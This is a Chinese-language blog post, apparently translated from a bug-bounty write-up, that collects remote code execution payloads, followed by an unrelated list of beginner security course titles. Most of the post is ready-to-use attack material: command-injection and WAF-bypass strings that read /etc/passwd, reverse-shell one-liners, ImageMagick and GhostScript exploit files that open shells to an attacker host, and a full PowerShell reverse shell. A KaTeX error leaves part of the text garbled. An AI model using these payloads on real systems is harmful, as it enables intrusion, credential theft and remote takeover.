关于远程代码执行的常用Payload(Unix 和 Windows)
大家好,我是 Ansar Uddin,我是来自孟加拉国的网络安全研究员。
这是我的第二篇 Bug 赏金文章。
今天的话题都是关于 Rce 的利用。
RCE:远程代码执行 (RCE) 使攻击者能够通过注入攻击执行恶意代码。代码注入攻击不同于命令注入攻击。攻击者的能力取决于服务器端解释器的限制。在某些情况下,攻击者可能能够从代码注入升级为命令注入。远程代码评估可能导致易受攻击的 Web 应用程序和 Web 服务器的全面妥协. 需要注意的是,几乎每种编程语言都有代码评估功能。
如何寻找 RCE:
Top 46 RCE 参数 :
exec={payload}``command={payload}``execute{payload}``ping={payload}``include={payload}``exclude={payload}``jump={payload}``code={payload}``reg={payload}``do={payload}``func={payload}``arg={payload}``option={payload}``load={payload}``process={payload}``step={payload}``read={payload}``function={payload}``req={payload}``feature={payload}``exe={payload}``module={payload}``payload={payload}``run={payload}``print={payload}``email={payload}``id={payload}``username={payload}``user={payload}``to={payload}``from={payload}``search={payload}``query={payload}``q={payload}``s={payload}``shopId={payload}``blogId={payload}``phone={payload}``mode={payload}``next={payload}``firstname={payload}``lastname={payload}``locale={payload}``cmd={payload}``sys={payload}``system={payload}
===
Linux RCE
Payload list:
id``,id``;id``;id;``'id'``"id"``''id``''id''``''id''&``*id``*id*``**id**``(id)````id` `````id`& `````id` & ```;id|``;|id|``|id``|id|``||id``||id|``||id;``|id;``&id``&id&``&&id``&&id&&``^id``<id``\id``);id``<id;``);id;``);id|``)|id``)|id;``\id;``\id|``\id\``(id``)id` `/id` `-id``:id``.id``" id``' id``| id``& id``, id``; id``& id &``&& id``|| id```' `id` ````" `id` ````, `id` ````| `id` ````& `id` ````; `id` ````' `id` #````" `id` #````, `id` #````| `id` #````; `id` #```;id/n``<id\n``\nid``\nid\n``a;id``a);id``a;id;``a);id|
转义所有危险字符时的RCE:
%7Cid``%7cid;pwd;uname -a``%26 id %26``%0aid%0a``%0a uname -a %0a``%27%0Awhoami%0A%27``%22%0Awhoami%0A%22``%5C%0Awhoami``%27%27%0Awhoami%0A%27%27``%2A%0Awhoami%0A``%2A%0Awhoami%0A%2A``%28%0Awhoami%0A%29``%60%0Aid%0A%60``%3B%0Awhoami%0A%3B``%2C%0Awhoami%0A%2C``%7C%0Awhoami``%7C%0Awhoami%0A%7C``%0a whoami %0a``%0Acat%20/etc/passwd``%7C%7Cid%0A``%2C%20id``%5Eid``%3Cid``%5Cid``%27%27id``%27%27id%27%27``%27%27id%27%27%26``%2Aid``%2Aid%2A``%2A%2Aid%2A%2A``%28id%29``%60id%60%26``%60id%60%20%26``%29%3Bid``%3Cid%3B``%29%3Bid%3B``%29%3Bid%7C``%29%7Cid``%29%7Cid%3B``%5Cid%3B``%5Cid%7C``%5Cid%5C``%22%20id``%27%20id``%7C%20id``%26%20id``%3B%20id``<id%0D``<id%0A``%0Did``%0Did%0D``%0Aid``%0Aid%0A``%2Cid``%3Bid``%3Bid%3B``%28id``%29id%20``%2Fid%20``%3Aid``%26%26%20id``%7C%7C%20id``%27id%27``%22id%22``%60id%60``%3Bid%7C``%3B%7Cid%7C``%7Cid%7C``%7C%7Cid``%7C%7Cid%7C``%7C%7Cid%3B``%7Cid%3B``%26id``%26id%26``%26%26id``%26%26id%26%26``%3Bid%2Fn``%3Cid%5Cn``%5Cnid``%5Cnid%5Cn``a%3Bid``a%29%3Bid``a%3Bid%3B``a%29%3Bid%7C``%22%2C%0Asystem%28%27ls%27%29%0A%3B%22``%27%0Aid%0A%27``%5C%0Awhoami%0A%5C``%26%0Awhoami%0A%26``%26%20id%20%26``%27%20%60id%60``%22%20%60id%60``%2C%20%60id%60``%7C%20%60id%60``%26%20%60id%60``%3B%20%60id%60``%27%20%60id%60%20%23``%22%20%60id%60%20%23``%2C%20%60id%60%20%23``%7C%20%60id%60%20%23``%3B%20%60id%60%20%23``%3Buname%20-a%3B``%26%26dir``%26%20uname%20-a%20%26id%7C%7Cwhoami%3B``id%7Cwhoami%3B``id%26%26whoami%3B``id%26whoami%3B``127.0.0.1%3Bls``127.0.0.1%3Bi%22d``%3Bunam%22e%24%7BIFS%7D-a``%3Bl%22s%24%7BIFS%7D-la``%27i%27d``%22i%22d``%5Cu%5Cn%5Ca%5Cm%5Ce%20%5C-%5Ca``cat%24u%20%2Fetc%24u%2Fpasswd%24u``w%24%7Bu%7Dh%24%7Bu%7Do%24%7Bu%7Da%24%7Bu%7Dm%24%7Bu%7Di``i%24%28u%29d``i%60u%60d``%7Buname%2C-a%7D``cat%24%7BIFS%7D%2Fetc%2Fpasswd``cat%24IFS%2Fetc%2Fpasswd``%0aid%0a``%0Aid``%0Aid%0A``%0a whoami %0a``cat%24u%2B%2Fetc%24u%2Fpasswd%24u``%22%3Bcat%2B%2Fetc%2Fpasswd%2B%23``%3B%2B%24u%2Bcat%2B%2Fetc%24u%2Fpasswd%24u``%3B%2B%24u%2Bcat%2B%2Fetc%24u%2Fpasswd%2B%5C%23``%2F%3F%3F%3F%2F%3F%3Ft%2B%2F%3F%3F%3F%2F%3F%3Fss%3F%3F``%2F%3Fin%2Fcat%2B%2Fet%3F%2Fpassw%3F``%3B%2Bcat%2B%2Fe%27tc%2Fpass%27wd``c%5C%5Ca%5C%5Ct%2B%2Fet%5C%5Cc%2Fpas%5C%5Cswd``cat%20%2Fetc%24u%2Fpasswd``%28sy.%28st%29.em%29%28whoami%29%3B``%3Bcat%2B%2Fetc%2Fpasswd``%3Bcat%2B%2Fetc%2Fpasswd%2B%23``%3Bcat%24u%2B%2Fetc%24u%2Fpasswd%24u``%3Bcat%2520%2Fetc%2Fpasswd``%3Bcat%20%2Fe%24%7Bhahaha%7Dtc%2F%24%7Bheywaf%7Dpas%24%7Bcatchthis%7Dswd``%3Bcat%24u%20%2Fetc%24u%2Fpasswd%24u``%3B%7Bcat%2C%2Fetc%2Fpasswd%7D``%3Bcat%3C%2Fetc%2Fpasswd``%3Bcat%24IFS%2Fetc%2Fpasswd``%3Becho%24%7BIFS%7D%22RCE%22%24%7BIFS%7D%26%26cat%24%7BIFS%7D%2Fetc%2Fpasswd``%3B%2Fusr%2Fbin%2Fid%3B``%7Ccat%2520%2Fetc%2Fpasswd``%7Ccat%20%2Fe%24%7Bhahaha%7Dtc%2F%24%7Bheywaf%7Dpas%24%7Bcatchthis%7Dswd``%7Ccat%24u%20%2Fetc%24u%2Fpasswd%24u``%7C%7Bcat%2C%2Fetc%2Fpasswd%7D``%7Ccat%3C%2Fetc%2Fpasswd``%7Ccat%24IFS%2Fetc%2Fpasswd``%7Cecho%24%7BIFS%7D%22RCE%22%24%7BIFS%7D%26%26cat%24%7BIFS%7D%2Fetc%2Fpasswd``%7C%2Fusr%2Fbin%2Fid%7C``%7C%7Ccat%2520%2Fetc%2Fpasswd``%7C%7Ccat%20%2Fe%24%7Bhahaha%7Dtc%2F%24%7Bheywaf%7Dpas%24%7Bcatchthis%7Dswd``%7C%7Ccat%24u%20%2Fetc%24u%2Fpasswd%24u``%7C%7C%7Bcat%2C%2Fetc%2Fpasswd%7D``%7C%7Ccat%3C%2Fetc%2Fpasswd``%7C%7Ccat%24IFS%2Fetc%2Fpasswd``%7C%7Cecho%24%7BIFS%7D%22RCE%22%24%7BIFS%7D%26%26cat%24%7BIFS%7D%2Fetc%2Fpasswd``%7C%7C%2Fusr%2Fbin%2Fid%7C%7C``%26%26cat%2520%2Fetc%2Fpasswd``%26%26cat%20%2Fe%24%7Bhahaha%7Dtc%2F%24%7Bheywaf%7Dpas%24%7Bcatchthis%7Dswd``%26%26cat%24u%20%2Fetc%24u%2Fpasswd%24u``%26%26%7Bcat%2C%2Fetc%2Fpasswd%7D``%26%26cat%3C%2Fetc%2Fpasswd``%26%26cat%24IFS%2Fetc%2Fpasswd``%26%26echo%24%7BIFS%7D%22RCE%22%24%7BIFS%7D%26%26cat%24%7BIFS%7D%2Fetc%2Fpasswd``%26%26%2Fusr%2Fbin%2Fid%26%26``%26cat%2520%2Fetc%2Fpasswd``%26cat%20%2Fe%24%7Bhahaha%7Dtc%2F%24%7Bheywaf%7Dpas%24%7Bcatchthis%7Dswd``%26cat%24u%20%2Fetc%24u%2Fpasswd%24u``%26%7Bcat%2C%2Fetc%2Fpasswd%7D``%26cat%3C%2Fetc%2Fpasswd``%26cat%24IFS%2Fetc%2Fpasswd``%26echo%24%7BIFS%7D%22RCE%22%24%7BIFS%7D%26%26cat%24%7BIFS%7D%2Fetc%2Fpasswd``%26%2Fusr%2Fbin%2Fid%26``%60cat%2520%2Fetc%2Fpasswd%60``%60cat%20%2Fe%24%7Bhahaha%7Dtc%2F%24%7Bheywaf%7Dpas%24%7Bcatchthis%7Dswd%60``%60cat%24u%20%2Fetc%24u%2Fpasswd%24u%60``%60%7Bcat%2C%2Fetc%2Fpasswd%7D%60``%60cat%3C%2Fetc%2Fpasswd%60``%60cat%24IFS%2Fetc%2Fpasswd%60``%60echo%24%7BIFS%7D%22RCE%22%24%7BIFS%7D%26%26cat%24%7BIFS%7D%2Fetc%2Fpasswd%60``%60%2Fusr%2Fbin%2Fid%60``%24%28cat%2520%2Fetc%2Fpasswd%29``%24%28cat%20%2Fe%24%7Bhahaha%7Dtc%2F%24%7Bheywaf%7Dpas%24%7Bcatchthis%7Dswd%29``%24%28cat%24u%20%2Fetc%24u%2Fpasswd%24u%29``%24%28%7Bcat%2C%2Fetc%2Fpasswd%7D%29``%24%28cat%3C%2Fetc%2Fpasswd%29``%24%28cat%24IFS%2Fetc%2Fpasswd%29``%24%28echo%24%7BIFS%7D%22RCE%22%24%7BIFS%7D%26%26cat%24%7BIFS%7D%2Fetc%2Fpasswd%29``%24%28%2Fusr%2Fbin%2Fid%29``cat%20%2Fetc%24u%2Fpasswd``%28sy.%28st%29.em%29%28whoami%29%3B``%3Bcat%2B%2Fetc%2Fpasswd``%3Bcat%2B%2Fetc%2Fpasswd%2B%23``%3Bcat%24u%2B%2Fetc%24u%2Fpasswd%24u``%253B%2524%257B%2540print%2528md5%2528%2522whoami0%2522%2529%2529%257D%253B``%24%7B%40system%28%22id%22%29%7D``%7Cuname%20-a%2B%7C%7Ca%2B%23%27%2B%7Cls%2B-la%7Ca%2B%23%7C%22%2B%7Cls%2B-la%7C%7Ca%2B%23``%22%2Csystem%28%27ls%27%29%3B%22``%24%7B%40phpinfo%28%29%7D``%3Bphpinfo%28%29%3B``%3Bphpinfo``%3Bsystem%28%27cat%2520%2Fetc%2Fpasswd%27%29``%3Bsystem%28%27id%27%29``%24%28id%29``%3B%24%7B%40print%28md5%28whoami%29%29%7D``%3B%24%7B%40print%28md5%28%22whoami%22%29%29%7D``%24%3Bid``%24%28%60cat%20%2Fetc%2Fpasswd%60%29``%7B%7B%20get_user_file%28%22%2Fetc%2Fpasswd%22%29%20%7D%7D``%3C%21--%23exec%20cmd%3D%22id%3B--%3E``system%28%27cat%20%2Fetc%2Fpasswd%27%29%3B``%3C%3Fphp%20system%28%22cat%20%2Fetc%2Fpasswd%22%29%3B%3F%3E``php%20-r%20%27var_dump%28exec%28%22id%22%29%29%3B%27``%26lt%3B%21--%23exec%2520cmd%3D%26quot%3Bid%3B--%26gt%3B``cat%24u%2B%2Fetc%24u%2Fpasswd%24u``%2Fbin%24u%2Fbash%24u%20%3Cip%3E%20%3Cport%3E``%22%3Bcat%2B%2Fetc%2Fpasswd%2B%23``%3B%2B%24u%2Bcat%2B%2Fetc%24u%2Fpasswd%24u``%3B%2B%24u%2Bcat%2B%2Fetc%24u%2Fpasswd%2B%5C%23``%2F%3F%3F%3F%2F%3F%3Ft%2B%2F%3F%3F%3F%2F%3F%3Fss%3F%3F``%2F%3Fin%2Fcat%2B%2Fet%3F%2Fpassw%3F``%3B%2Bcat%2B%2Fe%27tc%2Fpass%27wd``c%5C%5Ca%5C%5Ct%2B%2Fet%5C%5Cc%2Fpas%5C%5Cswd
RCE 过滤 and WAF Bypass:
'``whoami``'"``whoami```"` ```whoami````; ```whoami``;,``whoami``,|``whoami|``whoami``|\``whoami''``whoami``''*``whoami*``whoami``*(``whoami``)\``whoami``\&``whoami``&",``system('ls')``;"|uname -a+||a+#'+|ls+-la|a+#|"+|ls+-la||a+# Rce waf bypass``",system('ls');" double quote Rce filter bypass``${@system("id")} eval code bypass``${@phpinfo()}``;phpinfo();``;phpinfo``;system('cat%20/etc/passwd')``;system('id')``$(id)``;${@print(md5(whoami))}``;${@print(md5("whoami"))}``$;id```$(`cat /etc/passwd`)```{{ get_user_file("/etc/passwd") }}``<!--#exec cmd="id;-->``system('cat /etc/passwd');``<?php system("cat /etc/passwd");?>``php -r 'var_dump(exec("id"));'``<!--#exec%20cmd="id;-->/bin$u/bash$u <ip> <port>``cat$u+/etc$u/passwd$u``";cat+/etc/passwd+#``;+$u+cat+/etc$u/passwd$u``;+$u+cat+/etc$u/passwd+\#``/???/??t+/???/??ss??``/?in/cat+/et?/passw?``;+cat+/e'tc/pass'wd``c\\a\\t+/et\\c/pas\\swd``cat /etc$u/passwd``(sy.(st).em)(whoami);``;cat+/etc/passwd``;cat+/etc/passwd+#``;cat$u+/etc$u/passwd$u``;cat%20/etc/passwd``;cat /e${hahaha}tc/${heywaf}pas${catchthis}swd``;cat$u /etc$u/passwd$u``;{cat,/etc/passwd}``;cat</etc/passwd``;cat$IFS/etc/passwd``;echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd``;/usr/bin/id;``|cat%20/etc/passwd``|cat /e${hahaha}tc/${heywaf}pas${catchthis}swd``|cat$u /etc$u/passwd$u``|{cat,/etc/passwd}``|cat</etc/passwd``|cat$IFS/etc/passwd``|echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd``|/usr/bin/id|``||cat%20/etc/passwd``||cat /e${hahaha}tc/${heywaf}pas${catchthis}swd``||cat$u /etc$u/passwd$u``||{cat,/etc/passwd}``||cat</etc/passwd``||cat$IFS/etc/passwd``||echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd``||/usr/bin/id||``&&cat%20/etc/passwd``&&cat /e${hahaha}tc/${heywaf}pas${catchthis}swd``&&cat$u /etc$u/passwd$u``&&{cat,/etc/passwd}``&&cat</etc/passwd``&&cat$IFS/etc/passwd``&&echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd``&&/usr/bin/id&&``&cat%20/etc/passwd``&cat /e${hahaha}tc/${heywaf}pas${catchthis}swd``&cat$u /etc$u/passwd$u``&{cat,/etc/passwd}``&cat</etc/passwd``&cat$IFS/etc/passwd``&echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd``&/usr/bin/id&````cat%20/etc/passwd` `````cat /e${hahaha}tc/${heywaf}pas${catchthis}swd` `````cat$u /etc$u/passwd$u` `````{cat,/etc/passwd}` `````cat</etc/passwd` `````cat$IFS/etc/passwd` `````echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd` `````/usr/bin/id` ```$(cat%20/etc/passwd)``$(cat /e${hahaha}tc/${heywaf}pas${catchthis}swd)``$(cat$u /etc$u/passwd$u)``$({cat,/etc/passwd})``$(cat</etc/passwd)``$(cat$IFS/etc/passwd)``$(echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd)``$(/usr/bin/id)id||whoami;``id|whoami;``id&&whoami;``id&whoami;127.0.0.1;ls``127.0.0.1;i"d``;unam"e${IFS}-a``;l"s${IFS}-la'i'd``"i"d``\u\n\a\m\e \-\a``cat$u /etc$u/passwd$u``w${u}h${u}o${u}a${u}m${u}i``i$(u)d```i`u`d{uname,-a}```cat${IFS}/etc/passwd``cat$IFS/etc/passwd
例子:
'i’d
"i"d
\u\n\a\m\e \-\a
w
u
h
{u}h
uh{u}o
u
a
{u}a
ua{u}m${u}i
IFS=];b=cat]/etc/passwd;$b```IFS=,;`cat<<<cat,/etc/passwd` ```uname${IFS}-a``cat ${HOME:0:1}etc${HOME:0:1}passwd``cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd```cat$IFS$9${PWD%%[a-z]*}e*c${PWD%%[a-z]*}p?ss??cat${IFS}${PATH%%u*}etc${PATH%%u*}passwd${PATH##*s????}${PATH%%u*}c??${IFS}${PATH%%u*}e??${PATH%%u*}??ss??${PATH##*s????}${PATH%%u*}ca${u}t${IFS}${PATH%%u*}et${u}c${PATH%%u*}pas${u}swd${PATH##*s????}${PATH%%u*}bas${u}h${IFS}${PHP_CFLAGS%%f*}c${IFS}l${u}s${PATH:0:1}bi?${PATH:0:1}ca?${IFS}${PATH:0:1}et?${PATH:0:1}??sswdtail${IFS}${APACHE_CONFDIR%${APACHE_CONFDIR#?}}et?${APACHE_CONFDIR%${APACHE_CONFDIR#?}}pas?wdc${a}at${IFS}${APACHE_CONFDIR%apache2}pas${s}swdca${jjj}t${IFS}${APACHE_RUN_DIR%???????????????}et${jjj}c${APACHE_RUN_DIR%???????????????}pas${jjj}swdc${u}at${IFS}${PHP_INI_DIR%%u*p}e${u}tc${PHP_INI_DIR%%u*p}p${u}asswdcat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"` ````cat `xxd -r -p <<< 2f6574632f706173737764` ````cat `xxd -r -ps <(echo 2f6574632f706173737764)`1;uname${IFS}-a```1;uname${IFS}-a;#``1;uname${IFS}-a;#${IFS}'```1;uname${IFS}-a;#${IFS}';/*$(id)`id` `````/*$(id)`id``*/-id-'/*$(id)`id` #*/-id||'"||id||"/*`*/``````/*$(id)`id``*/id'/*$(id)`id` #*/id||'"||id||"/*`*/````
IFS=,;`cat<<<cat,/etc/passwd`
/*$(id)`id`
/*KaTeX parse error: Got function '\`' with no arguments as argument to '\`' at position 11: (id)\`id\`\̲`̲\*/id’/\*(id)`id` #*/id||’”||id||”/*`*/
反弹shell :
nc -l 1337``curl https://reverse-shell.sh/yourip:1337 | shReverse Shell Generator:``https://www.revshells.com
**实战案例
**
我在一家Top级的公司找到了一个案例:
我检查了include=参数. 它容易受到 rce 的影响
'``whoami && id && uname -a && cat /etc/passwd``'
但是有一个 waf 阻止了我的请求
我用了下面这个payload进行绕过:
'``whoami && id && uname -a && cat /etc/passwd``'
我将payload转换为 url 编码再进行发包:
最终使用的绕过waf的payload如下:
%27%0a%77%68%6f%61%6d%69%20%26%26%20%69%64%20%26%26%20%75%6e%61%6d%65%20%2d%61%20%26%26%20%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%0a%27
成功Rce!
Imagemagick rce:
nc -l -p 1337
另存为 test.gif 或 test.jpg
1.``push graphic-context``viewbox 0 0 640 480```fill 'url(https://127.0.0.0/oops.jpg?`echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL3lvdXJpcC95b3VycG9ydCAwPiYx | base64 -d | bash`"||id " )'```pop graphic-context``2.``push graphic-context``encoding "UTF-8"``viewbox 0 0 1 1``affine 1 0 0 1 0 0``push graphic-context``image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/yourip/yourport 0<&1 2>&1'``pop graphic-context``pop graphic-context``3.``%!PS``userdict /setpagedevice undef``save``legal``{ null restore } stopped { pop } if``{ legal } stopped { pop } if``restore``mark /OutputFile (%pipe%ncat yourip yourport -e /bin/sh) currentdevice putdeviceprops``4.``%!PS``userdict /setpagedevice undef``legal``{ null restore } stopped { pop } if``legal``mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/yourip/yourport 0>&1') currentdevice putdeviceprops
保存poc.xml:
<?xml version="1.0" standalone="no"?>``<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"``"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">``<svg width="640px" height="480px" version="1.1"``xmlns="http://www.w3.org/2000/svg" xmlns:xlink=``"http://www.w3.org/1999/xlink">``<image xlink:href="https://example.com/image.jpg"|/bin/nc.traditional yourip yourport -e /bin/bash""``x="0" y="0" height="640px" width="480px"/>``</svg>
===
GhostScript Rce:
nc -nvlp 1337
保存 test.gif or test.jpg
1.``%!PS``userdict /setpagedevice undef``legal``{ null restore } stopped { pop } if``legal``mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/yourip/yourport 0>&1') currentdevice putdeviceprops``2.``%!PS``0 1 300367 {} for``{save restore} stopped {} if``(%pipe%bash -c 'bash -i >& /dev/tcp/yourip/yourport 0>&1') (w) file``3.``%!PS``userdict /setpagedevice undef``save``legal``{ null restore } stopped { pop } if``{ legal } stopped { pop } if``restore``mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/yourip/yourport 0>&1') currentdevice putdeviceprops``4.``%!PS``userdict /setpagedevice undef``legal``{ null restore } stopped { pop } if``legal``mark /OutputFile (%pipe%curl http://inputburpcollaborator) currentdevice putdeviceprops
保存 poc.pdf
%!PS``currentdevice null true mark /OutputICCProfile (%pipe%curl http://inputburpcollaborator)``.putdeviceparams``quit
下面这个github项目最适合在上传功能上查找 Rce 错误
https://github.com/modzero/mod0BurpUploadScanner.git
PHPGGC:PHP 通用小工具链:
该工具允许您生成payload,而无需执行查找小工具和组合它们的繁琐步骤。它可以看作是frohoff 的 ysoserial的等价物,但对于 PHP。目前,该工具支持的小工具链包括:CodeIgniter4、Doctrine、Drupal7、Guzzle、Laravel、Magento、Monolog、Phalcon、Podio、Slim、SwiftMailer、Symfony、Wordpress、Yii 和 ZendFramework
这个最适合查找 rce漏洞(框架/库):
https://github.com/ambionics/phpggc
Windows RCE
Payload list:
".system('dir')."``' dir``' || dir``' & dir``' && dir``'; dir``" dir``" || dir``" | dir``" & dir``" && dir``"; dir``dir```$(`dir`)```&&dir``| dir C:\``; dir C:\``& dir C:\``&& dir C:\``dir C:\``| dir``; dir``& dir``&& dir| ipconfig /all``; ipconfig /all``& ipconfig /all``&& ipconfig /all``ipconfig /all|| phpinfo()``| phpinfo()` `{${phpinfo()}}``;phpinfo()``;phpinfo();//``';phpinfo();//``{${phpinfo()}}``& phpinfo()``&& phpinfo()``phpinfo()``phpinfo();
转义所有危险字符时的RCE payload:
%27%20dir``%27%20%7C%7C%20dir``%27%20%26%20dir``%27%20%26%26%20dir``%27%3B%20dir``%22%20dir``%22%20%7C%7C%20dir``%22%20%7C%20dir``%22%20%26%20dir``%22%20%26%26%20dir``%22%3B%20dir``%22.system%28%27dir%27%29.%22``%24%28%60dir%60%29``%26%26dir``%7C%20dir%20C%3A%5C``%3B%20dir%20C%3A%5C``%26%20dir%20C%3A%5C``%26%26%20dir%20C%3A%5C``dir%20C%3A%5C``%7C%20dir``%3B%20dir``%26%20dir``%26%26%20dir``+dir+c:\+|``+|+dir+c:\+|``+|+dir+c:%2f+|``dir+c:\``||+dir|c:\``+|+Dir+c:\``+|+Dir+c:%255c``+|+Dir+c:%2f``$+|+Dir+c:\``$+|+Dir+c:%255c``$+|+Dir+c:%2f``%26%26+|+dir c:\``%0a+dir+c:\``%26%26+|+dir c:%2f``$%26%26dir+c:%2f``%0a+dir+c:%2f``%0a+dir+c:%255c``$%26%26dir c:\``%26%26+|+dir c:%255c``$%26%26dir+c:%255c``%20{${phpinfo()}}
反弹shell:
nc -nvlp 443
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('your ip',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =``$stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.T``ext.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );``$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII``).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$c``lient.Close()"``or``powershell -NoP -NonI -W Hidden -Exec Bypass "& {$ps=$false;$hostip='your ip';$port=443;$client = New-Object System.Net.Sockets.TCPClient($hostip,$port);$stream = $client.GetStream();[byte[]]$bytes = 0..50000|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$cmd=(get-childitem Env:ComSpec).value;$inArray=$data.split();$item=$inArray[0];if(($item -eq '$ps') -and ($ps -eq $false)){$ps=$true}if($item -like '?:'){$item='d:'}$myArray=@('cd','exit','d:','pwd','ls','ps','rm','cp','mv','cat');$do=$false;foreach ($i in $myArray){if($item -eq $i){$do=$true}}if($do -or $ps){$sendback=( iex $data 2>&1 |Out-String)}else{$data2='/c '+$data;$sendback = ( &$cmd $data2 2>&1 | Out-String)};if($ps){$prompt='PS ' + (pwd).Path}else{$prompt=(pwd).Path}$sendback2 = $data + $sendback + $prompt + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()}"
反弹shell生成器:
https://www.revshells.com
文件下载:
powershell -c "(new-object System.Net.WebClient).DownloadFile('https://eternallybored.org/misc/wget/1.21.1/64/wget.exe','C:\Users\admin\Desktop\wget.exe')"``powershell iwr -uri http://10.10.16.97:8000/chisel.exe -outfile ch.exe # also works in PS ConstrainLanguageMode
Rce(Unix 和 windows)的最佳 burpsuite 扩展:
https://github.com/ewilded/shelling
最佳的命令注入利用工具:
https://github.com/commixproject/commix
Happy Hacking!
黑客/网络安全学习路线
对于从来没有接触过黑客/网络安全的同学,目前网络安全、信息安全也是计算机大学生毕业薪资相对较高的学科。
大白也帮大家准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
这也是耗费了大白近四个月的时间,吐血整理,文章非常非常长,觉得有用的话,希望粉丝朋友帮忙点个**「分享」「收藏」「在看」「赞」**
网络安全/渗透测试法律法规必知必会****
今天大白就帮想学黑客/网络安全技术的朋友们入门必须先了解法律法律。
【网络安全零基础入门必知必会】什么是黑客、白客、红客、极客、脚本小子?(02)
【网络安全零基础入门必知必会】网络安全专业术语全面解析(05)
【网络安全入门必知必会】《中华人民共和国网络安全法》(06)
【网络安全零基础入门必知必会】《计算机信息系统安全保护条例》(07)
【网络安全零基础入门必知必会】《中国计算机信息网络国际联网管理暂行规定》(08)
【网络安全零基础入门必知必会】《计算机信息网络国际互联网安全保护管理办法》(09)
【网络安全零基础入门必知必会】《互联网信息服务管理办法》(10)
【网络安全零基础入门必知必会】《计算机信息系统安全专用产品检测和销售许可证管理办法》(11)
【网络安全零基础入门必知必会】《通信网络安全防护管理办法》(12)
【网络安全零基础入门必知必会】《中华人民共和国国家安全法》(13)
【网络安全零基础入门必知必会】《中华人民共和国数据安全法》(14)
【网络安全零基础入门必知必会】《中华人民共和国个人信息保护法》(15)
【网络安全零基础入门必知必会】《网络产品安全漏洞管理规定》(16)
网络安全/渗透测试linux入门必知必会
【网络安全零基础入门必知必会】什么是Linux?Linux系统的组成与版本?什么是命令(01)
【网络安全零基础入门必知必会】VMware下载安装,使用VMware新建虚拟机,远程管理工具(02)
【网络安全零基础入门必知必会】VMware常用操作指南(非常详细)零基础入门到精通,收藏这一篇就够了(03)
【网络安全零基础入门必知必会】CentOS7安装流程步骤教程(非常详细)零基入门到精通,收藏这一篇就够了(04)
【网络安全零基础入门必知必会】Linux系统目录结构详细介绍(05)
【网络安全零基础入门必知必会】Linux 命令大全(非常详细)零基础入门到精通,收藏这一篇就够了(06)
【网络安全零基础入门必知必会】linux安全加固(非常详细)零基础入门到精通,收藏这一篇就够了(07)
网络安全/渗透测试****计算机网络入门必知必会****
【网络安全零基础入门必知必会】TCP/IP协议深入解析(非常详细)零基础入门到精通,收藏这一篇就够了(01)
【网络安全零基础入门必知必会】什么是HTTP数据包&Http数据包分析(非常详细)零基础入门到精通,收藏这一篇就够了(02)
【网络安全零基础入门必知必会】计算机网络—子网划分、子网掩码和网关(非常详细)零基础入门到精通,收藏这一篇就够了(03)
网络安全/渗透测试入门之HTML入门必知必会
【网络安全零基础入门必知必会】什么是HTML&HTML基本结构&HTML基本使用(非常详细)零基础入门到精通,收藏这一篇就够了1
【网络安全零基础入门必知必会】VScode、PhpStorm的安装使用、Php的环境配置,零基础入门到精通,收藏这一篇就够了2
【网络安全零基础入门必知必会】HTML之编写登录和文件上传(非常详细)零基础入门到精通,收藏这一篇就够了3
网络安全/渗透测试入门之Javascript入门必知必会
【网络安全零基础入门必知必会】Javascript语法基础(非常详细)零基础入门到精通,收藏这一篇就够了(01)
【网络安全零基础入门必知必会】Javascript实现Post请求、Ajax请求、输出数据到页面、实现前进后退、文件上传(02)
网络安全/渗透测试入门之Shell入门必知必会
【网络安全零基础入门必知必会】Shell编程基础入门(非常详细)零基础入门到精通,收藏这一篇就够了(第七章)
网络安全/渗透测试入门之PHP入门必知必会
【网络安全零基础入门】PHP环境搭建、安装Apache、安装与配置MySQL(非常详细)零基础入门到精通,收藏这一篇就够(01)
【网络安全零基础入门】PHP基础语法(非常详细)零基础入门到精通,收藏这一篇就够了(02)
【网络安全零基础入门必知必会】PHP+Bootstrap实现表单校验功能、PHP+MYSQL实现简单的用户注册登录功能(03)
网络安全/渗透测试入门之MySQL入门必知必会
【网络安全零基础入门必知必会】MySQL数据库基础知识/安装(非常详细)零基础入门到精通,收藏这一篇就够了(01)
【网络安全零基础入门必知必会】SQL语言入门(非常详细)零基础入门到精通,收藏这一篇就够了(02)
【网络安全零基础入门必知必会】MySQL函数使用大全(非常详细)零基础入门到精通,收藏这一篇就够了(03)
【网络安全零基础入门必知必会】MySQL多表查询语法(非常详细)零基础入门到精通,收藏这一篇就够了(04)
****网络安全/渗透测试入门之Python入门必知必会
【网络安全零基础入门必知必会】之Python+Pycharm安装保姆级教程,Python环境配置使用指南,收藏这一篇就够了【1】
【网络安全零基础入门必知必会】之Python编程入门教程(非常详细)零基础入门到精通,收藏这一篇就够了(2)
python入门教程python开发基本流程控制if … else
